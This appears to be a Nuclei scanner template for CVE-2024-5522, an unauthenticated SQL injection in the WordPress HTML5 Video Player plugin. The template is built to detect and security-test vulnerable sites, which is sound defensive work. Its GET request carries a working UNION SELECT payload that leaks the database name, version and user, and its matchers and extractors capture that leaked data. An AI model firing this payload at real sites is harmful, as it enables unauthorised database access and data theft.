46 lines
1.3 KiB
YAML
46 lines
1.3 KiB
YAML
id: CVE-2024-5522
|
|
|
|
info:
|
|
name: WordPress H5VP Plugin <= 2.5.26 - SQL Injection
|
|
author: JohnDoeAnonITA
|
|
severity: high
|
|
description: |
|
|
The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-5522
|
|
- https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
|
|
classification:
|
|
cvss-score: 10
|
|
cve-id: CVE-2024-5522
|
|
epss-score: 0.04
|
|
epss-percentile: 9
|
|
metadata:
|
|
verified: false
|
|
max-request: 1
|
|
tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,h5vp
|
|
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,database(),0x7c76657273696f6e3a,version(),0x7c757365723a,user()),2,3,4,5,6,7,8-- -"
|
|
redirects: true
|
|
max-redirects: 3
|
|
headers:
|
|
Cookie: "instawp_skip_splash=true; path=/"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "database:.*\\|version:.*\\|user:.*"
|
|
part: body
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- ":\"*([^,]+),\"tit" |